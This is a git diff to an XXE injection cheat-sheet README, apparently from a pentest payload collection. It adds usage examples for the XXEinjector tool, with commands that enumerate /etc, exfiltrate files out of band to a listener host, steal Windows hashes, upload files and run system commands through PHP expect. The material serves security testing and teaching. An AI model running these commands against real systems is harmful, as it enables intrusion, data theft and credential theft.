diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index b11ebd9..d4792dd 100644
--- a/XXE Injection/README.md	
+++ b/XXE Injection/README.md	
@@ -42,7 +42,31 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
    ```
    $ python3 230.py 2121
    ```
-   
+ - [XXEinjector](https://github.com/enjoiz/XXEinjector)
+   ```bash
+   # Enumerating /etc directory in HTTPS application:
+   ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
+   # Enumerating /etc directory using gopher for OOB method:
+   ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
+   # Second order exploitation:
+   ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
+   # Bruteforcing files using HTTP out of band method and netdoc protocol:
+   ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
+   # Enumerating using direct exploitation:
+   ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
+   # Enumerating unfiltered ports:
+   ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
+   # Stealing Windows hashes:
+   ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
+   # Uploading files using Java jar:
+   ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
+   # Executing system commands using PHP expect:
+   ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
+   # Testing for XSLT injection:
+   ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
+   # Log requests only:
+   ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
+   ```
 
 ## Detect the vulnerability
 
@@ -454,4 +478,4 @@ updating: xl/sharedStrings.xml (deflated 17%)
 * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
 * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
 - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
-- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
\ No newline at end of file
+- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)